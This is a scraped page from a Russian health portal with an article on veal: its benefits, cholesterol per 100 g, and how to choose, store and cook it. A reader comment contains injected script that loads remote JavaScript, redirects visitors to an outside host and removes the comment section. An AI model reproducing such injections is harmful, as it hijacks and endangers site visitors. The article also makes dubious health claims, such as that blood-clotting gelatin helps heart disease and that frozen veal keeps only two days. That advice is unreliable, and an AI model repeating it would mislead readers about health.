Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Телятина – самое нежное м...  >>  Телятина – самое нежное мясо
 
Обратная связь
 

Телятина – самое нежное мясо

Размер шрифта
18 января 2012 07:40
  • google_analytics: false
  • Нравится

В этом мясе мало холестерина, зато много желатина, способствующего светываемости крови. Как правильно выбрать, приготовить, и съесть телятину?

1

На качество мяса вбольшой степени влияет возраст животного. Телятина – это совсем не то же самое, что говядина. Мясо молодой коровы существенно отличается по своим свойствам от мяса взрослого животного.

Польза телятины

  1. Телятина – это мясо с низким содержанием холестерина. При ее употреблении организм получает куда меньшую холестериновую нагрузку, чем от говядины или баранины. 

  2. Телятина содержит желатин, который способствует свертываемости крови. Таким образом, употребление телятины полезно при сердечно-сосудистых заболеваниях.

  3. В телятине также содержатся особые экстрактивные вещества. Они не имеют особой питательной ценности, зато возбуждают выделение желудочного сока. Это способствует лучшему пищеварению.

Пьедестал почета по содержанию холестерина

Телятина – 60 мг (на 100 грамм)
Говядина – 80 мг
Баранина – 100 мг

Как выбрать

  1. Цвет молодой телятины – светло-розовый, а жир белый и нелипкий.

  2. Поверхность молодой телятины при надавливании на нее пальцем быстро выравнивается. А палец остается сухим.

Как хранить

Хранить телятину нужно в морозильной камере не дольше двух дней. Позже она потеряет свой вкус и качества.

Как готовить

Телятину можно использовать практически для всех блюд, в которых содержится мясо. Но лучше всего ее варить – ведь жареное мясо содержит канцерогены. Вкусное и полезное блюдо – бульон из телятины.

  • Мясо следует положить в холодную воду, чтобы в него перешли питательные вещества.
  • Варить свежую говядину нужно не менее часа после закипания. Когда бульон закипел, крышку не нужно снимать до самого конца процесса. Также не стоит снимать пенку – это полезный белок.
  • После окончания варки дайте бульону настояться не меньше 10 минут.


Cюжеты по теме:
Телятина. Диетическое мясо

 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.